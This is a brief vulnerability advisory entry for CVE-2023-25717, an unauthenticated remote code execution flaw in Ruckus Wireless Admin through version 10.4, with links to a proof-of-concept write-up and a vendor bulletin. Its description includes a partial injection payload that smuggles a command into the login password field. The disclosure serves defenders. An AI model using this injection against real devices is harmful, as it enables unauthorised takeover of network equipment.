CVE-2023-25717 Information

Description

Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring.

Reference

https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/
https://support.ruckuswireless.com/security_bulletins/315
